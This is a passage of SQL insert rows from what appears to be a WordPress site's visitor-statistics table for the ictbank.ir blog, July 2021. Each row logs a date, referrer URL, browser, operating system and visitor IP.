(11906,'2021-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11907,'2021-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11908,'2021-07-02','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','209.141.59.22','000',0,2,0),
(11909,'2021-07-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.186','000',0,1,0),
(11910,'2021-07-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(11911,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.148.146','000',0,2,0),
(11912,'2021-07-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.5','000',0,1,0),
(11913,'2021-07-03','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','1.38.52.50','000',0,2,0),
(11914,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.186.155','000',0,1,0),
(11915,'2021-07-03','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','14.243.66.209','000',0,2,0),
(11916,'2021-07-03','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','205.185.119.153','000',0,2,0),
(11917,'2021-07-03','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.57.67','000',0,2,0),
(11918,'2021-07-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(11919,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,2,0),
(11920,'2021-07-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(11921,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.83.44','000',0,2,0),
(11922,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.13.223','000',0,1,0),
(11923,'2021-07-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.63.39.181','000',0,2,0),
(11924,'2021-07-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,2,0),
(11925,'2021-07-03','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.207.145.31','000',0,2,0),
(11926,'2021-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11927,'2021-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(11928,'2021-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11929,'2021-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11930,'2021-07-03','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','200.53.24.142','000',0,2,0),
(11931,'2021-07-03','http://ictbank.ir','Firefox','Linux','Unknown',NULL,NULL,'','144.76.156.232','000',0,1,0),
(11932,'2021-07-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(11933,'2021-07-03','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','185.38.151.16','000',0,2,0),
(11934,'2021-07-03','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.74','000',0,2,0),
(11935,'2021-07-03','http://design-arena.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','185.158.115.77','000',0,2,0),
(11936,'2021-07-04','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','185.158.115.77','000',0,1,0),
(11937,'2021-07-04','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','177.107.76.14','000',0,2,0),
(11938,'2021-07-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(11939,'2021-07-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(11940,'2021-07-04','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','42.114.163.142','000',0,2,0),
(11941,'2021-07-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','54.236.58.200','000',0,1,0),
(11942,'2021-07-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.5','000',0,3,0),
(11943,'2021-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.57.215','000',0,1,0),
(11944,'2021-07-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(11945,'2021-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.139.214','000',0,2,0),
(11946,'2021-07-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,1,0),
(11947,'2021-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.171.198','000',0,1,0),
(11948,'2021-07-04','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,2,0),
(11949,'2021-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11950,'2021-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11951,'2021-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11952,'2021-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11953,'2021-07-04','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','60.126.245.163','000',0,2,0),
(11954,'2021-07-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','213.108.7.76','000',0,2,0),
(11955,'2021-07-04','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','46.211.58.40','000',0,3,0),
(11956,'2021-07-04','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','178.216.49.140','000',0,13,0),
(11957,'2021-07-04','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','37.72.186.67','000',0,2,0),
(11958,'2021-07-04','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.74.54.109','000',0,1,0),
(11959,'2021-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.115','000',0,2,0),
(11960,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.192.138','000',0,2,0),
(11961,'2021-07-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(11962,'2021-07-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(11963,'2021-07-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.156.174.14','000',0,61,0),
(11964,'2021-07-05','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','5.90.203.120','000',0,2,0),
(11965,'2021-07-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','213.108.7.76','000',0,2,0),
(11966,'2021-07-05','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.112.82.220','000',0,2,0),
(11967,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.45.130','000',0,2,0),
(11968,'2021-07-05','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','113.161.238.234','000',0,2,0),
(11969,'2021-07-05','http://ictbank.ir/blog','Opera Mobile','Windows','6.1',NULL,NULL,'','176.10.104.240','000',0,1,0),
(11970,'2021-07-05','http://ictbank.ir/blog','Opera Mobile','Windows','6.1',NULL,NULL,'','109.70.100.32','000',0,1,0),
(11971,'2021-07-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','199.249.230.74','000',0,1,0),
(11972,'2021-07-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','192.42.116.16','000',0,3,0),
(11973,'2021-07-05','http://ictbank.ir/blog','Safari','OS X','10.6.6',NULL,NULL,'','5.253.63.133','000',0,6,0),
(11974,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,2,0),
(11975,'2021-07-05','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.105.1.170','000',0,2,0),
(11976,'2021-07-05','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.214.159.244','000',0,1,0),
(11977,'2021-07-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(11978,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.149.91','000',0,1,0),
(11979,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.80.157.50','000',0,1,0),
(11980,'2021-07-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(11981,'2021-07-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.90','000',0,2,0),
(11982,'2021-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(11983,'2021-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11984,'2021-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11985,'2021-07-05','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','107.189.8.176','000',0,2,0),
(11986,'2021-07-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(11987,'2021-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,2,0),
(11988,'2021-07-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','84.229.127.143','000',0,3,0),
(11989,'2021-07-05','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','41.210.1.151','000',0,2,0),
(11990,'2021-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','218.22.213.30','000',0,13,0),
(11991,'2021-07-06','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','106.45.10.68','000',0,1,0),
(11992,'2021-07-06','http://ictbank.ir/blog','Chrome','Fedora','Unknown',NULL,NULL,'','182.1.125.240','000',0,2,0),
(11993,'2021-07-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(11994,'2021-07-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,50,0),
(11995,'2021-07-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','85.76.12.27','000',0,4,0),
(11996,'2021-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,4,0),
(11997,'2021-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.28.146','000',0,2,0),
(11998,'2021-07-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','222.246.39.219','000',0,2,0),
(11999,'2021-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.232.179.61','000',0,1,0),
(12000,'2021-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.113.215','000',0,1,0),
(12001,'2021-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12002,'2021-07-06','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','200.87.211.48','000',0,2,0),
(12003,'2021-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.67.40','000',0,1,0),
(12004,'2021-07-06','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,2,0),
(12005,'2021-07-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,2,0),
(12006,'2021-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(12007,'2021-07-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12008,'2021-07-06','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','105.134.56.148','000',0,2,0),
(12009,'2021-07-06','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(12010,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12011,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(12012,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(12013,'2021-07-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12014,'2021-07-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12015,'2021-07-07','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','180.242.219.118','000',0,2,0),
(12016,'2021-07-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.89','000',0,1,0),
(12017,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','89.161.250.174','000',0,2,0),
(12018,'2021-07-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.126','000',0,1,0),
(12019,'2021-07-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','122.254.89.36','000',0,1,0),
(12020,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.219.146','000',0,2,0),
(12021,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12022,'2021-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(12023,'2021-07-07','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(12024,'2021-07-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(12025,'2021-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12026,'2021-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(12027,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(12028,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12029,'2021-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12030,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(12031,'2021-07-07','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','122.52.123.95','000',0,2,0),
(12032,'2021-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(12033,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.237.1','000',0,2,0),
(12034,'2021-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12035,'2021-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.195.93','000',0,1,0),
(12036,'2021-07-07','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','196.189.89.247','000',0,2,0),
(12037,'2021-07-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.115','000',0,2,0),
(12038,'2021-07-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(12039,'2021-07-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,2,0),
(12040,'2021-07-08','https://duckduckgo.com/','Firefox','Windows','6.1',NULL,NULL,'','202.56.55.212','000',0,7,0),
(12041,'2021-07-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','1.56.139.165','000',0,2,0),
(12042,'2021-07-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(12043,'2021-07-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','5.128.200.38','000',0,2,0),
(12044,'2021-07-08','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','213.127.22.1','000',0,1,0),
(12045,'2021-07-08','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','42.193.45.103','000',0,2,0),
(12046,'2021-07-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.229.184.143','000',0,2,0),
(12047,'2021-07-08','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','62.105.142.245','000',0,2,0),
(12048,'2021-07-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12049,'2021-07-08','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','91.76.250.25','000',0,2,0),
(12050,'2021-07-08','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','83.110.77.12','000',0,2,0),
(12051,'2021-07-08','http://82.102.9.14:80/blog','Safari','OS X','10.15.5',NULL,NULL,'','121.36.56.183','000',0,4,0),
(12052,'2021-07-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12053,'2021-07-08','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','1.15.175.155','000',0,2,0),
(12054,'2021-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(12055,'2021-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(12056,'2021-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12057,'2021-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12058,'2021-07-08','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.219.20','000',0,2,0),
(12059,'2021-07-08','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','182.176.161.16','000',0,2,0),
(12060,'2021-07-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(12061,'2021-07-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.78.163.232','000',0,2,0),
(12062,'2021-07-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','3.248.232.180','000',0,1,0),
(12063,'2021-07-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','50.116.59.214','000',0,2,0),
(12064,'2021-07-09','http://design-arena.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','91.76.250.25','000',0,2,0),
(12065,'2021-07-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12066,'2021-07-09','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','49.12.126.16','000',0,9,0),
(12067,'2021-07-09','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','50.117.136.95','000',0,2,0),
(12068,'2021-07-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.116.239.178','000',0,1,0),
(12069,'2021-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.130','000',0,2,0),
(12070,'2021-07-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12071,'2021-07-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.190.39.239','000',0,3,0),
(12072,'2021-07-09','http://design-arena.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.25.48.30','000',0,1,0),
(12073,'2021-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12074,'2021-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12075,'2021-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12076,'2021-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12077,'2021-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12078,'2021-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12079,'2021-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12080,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.114.105','000',0,2,0),
(12081,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.189.29','000',0,2,0),
(12082,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.142.53','000',0,2,0),
(12083,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.171.228','000',0,2,0),
(12084,'2021-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','77.222.117.245','000',0,1,0),
(12085,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.156.20','000',0,1,0),
(12086,'2021-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.82.38','000',0,2,0),
(12087,'2021-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(12088,'2021-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(12089,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.208.161.218','000',0,2,0),
(12090,'2021-07-10','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','54.216.162.147','000',0,1,0),
(12091,'2021-07-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','123.178.150.230','000',0,3,0),
(12092,'2021-07-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12093,'2021-07-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.116.239.178','000',0,2,0),
(12094,'2021-07-10','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','190.235.32.194','000',0,2,0),
(12095,'2021-07-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.162','000',0,2,0),
(12096,'2021-07-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12097,'2021-07-10','http://ictbank.ir/blog','Opera','Windows','Unknown',NULL,NULL,'','209.107.210.56','000',0,2,0),
(12098,'2021-07-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','49.205.254.33','000',0,2,0),
(12099,'2021-07-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.130','000',0,2,0),
(12100,'2021-07-10','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','183.81.121.170','000',0,2,0),
(12101,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.100.26.231','000',0,2,0),
(12102,'2021-07-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.188.182.110','000',0,2,0),
(12103,'2021-07-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.107.216.219','000',0,2,0),
(12104,'2021-07-10','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(12105,'2021-07-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','45.250.50.216','000',0,2,0),
(12106,'2021-07-10','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','109.125.173.70','000',0,2,0),
(12107,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.55.182','000',0,2,0),
(12108,'2021-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(12109,'2021-07-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,1,0),
(12110,'2021-07-10','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,3,0),
(12111,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.94.177.135','000',0,2,0),
(12112,'2021-07-10','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.18.225.82','000',0,13,0),
(12113,'2021-07-10','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','178.216.49.211','000',0,2,0),
(12114,'2021-07-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12115,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.140.197','000',0,1,0),
(12116,'2021-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.121.164.52','000',0,1,0),
(12117,'2021-07-10','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','2.57.122.19','000',0,2,0),
(12118,'2021-07-10','http://ictbank.ir/blog','Netscape','Windows','5.1',NULL,NULL,'','95.53.92.229','000',0,2,0),
(12119,'2021-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(12120,'2021-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12121,'2021-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12122,'2021-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12123,'2021-07-10','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.214.40.162','000',0,1,0),
(12124,'2021-07-10','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','6.1',NULL,NULL,'','178.159.37.24','000',0,3,0),
(12125,'2021-07-10','https://www.google.com/','Opera','Linux','Unknown',NULL,NULL,'','98.102.138.69','000',0,2,0),
(12126,'2021-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12127,'2021-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.115','000',0,2,0),
(12128,'2021-07-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12129,'2021-07-11','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.113.206.49','000',0,2,0),
